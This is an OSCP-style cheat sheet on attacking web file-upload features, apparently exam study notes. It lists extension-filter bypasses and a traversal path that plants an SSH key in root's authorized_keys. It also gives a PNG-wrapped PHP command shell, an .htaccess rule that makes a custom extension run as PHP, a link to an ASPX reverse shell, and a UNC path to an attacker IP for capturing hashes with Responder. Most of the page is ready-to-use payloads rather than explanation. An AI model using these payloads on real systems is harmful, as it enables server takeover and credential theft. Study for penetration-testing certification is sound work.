// notes/ Web Exploitation
🕸️

File Upload

Notes from oscp.adot8.com — web applications.

#web applications#adot8
source · oscp.adot8.com · web-applications/file-upload

File Upload

code
01.pHP .php%00 .asp .pl
02.phps .php%20 .aspx .cgi
03.php2-7 .php%0a .ashx
04.phar .php%00.png .jsp
05.phtml .php#png .jspx
06.pht .png.php .jsw

If the web application indicates that the file already exists, we can use this method to brute force the contents of a web server

Combined with directory traversal

code
01../../../../../../../test.txt
02../../../../../../../root/.ssh/authorized_keys <-- include public key

Magic Bytes

Only include the first and last bytes of an approved file type and inject php code in the middle

<pre><code>�PNG ����lk�7�,ZtSoftwareAdobe ImageReadyq�e&#x3C;3�IDATx��� &#x3C;?php system($_GET['cmd']); ����lk�7�, <strong>����lk�7�, </strong></code></pre>

{% embed url="https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx" %}

.htaccess

Upload a new .htaccess file and allow a new file extension to be executed

code
01AddType application/x-httpd-php .pwned

Now upload a reverse shell with the .pwned extension

Responder + File upload

Spin up responder and change file name to share and watch the hashes fly

code
01"\\\\192.168.45.237\\adot8"
<figure><img src="/files/CkjlTQrycMCfLaxEm0Px" alt=""><figcaption></figcaption></figure> <figure><img src="/files/VVLyEGwdbiKhdDeVxNZx" alt=""><figcaption></figcaption></figure>